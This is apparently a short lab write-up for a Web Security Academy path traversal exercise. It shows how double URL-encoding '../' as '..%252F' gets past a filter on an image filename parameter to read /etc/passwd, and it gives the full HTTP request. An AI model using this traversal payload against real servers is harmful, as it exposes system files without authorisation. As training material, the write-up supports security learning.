We found image file in the request
Via LFI try ../../../etc/passwd
we get No such file
if we try many ../ like : ../../../../../../../../../../../../../../../etc/passwd
we found mitigation for LFI 

bypass this filter with 2 URL incoding to (../) :
GET /image?filename=..%252F..%252F..%252Fetc/passwd HTTP/2
Host: 0a4900ef03428b1d804bf4f3003a00af.web-security-academy.net
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Cache-Control: max-age=0

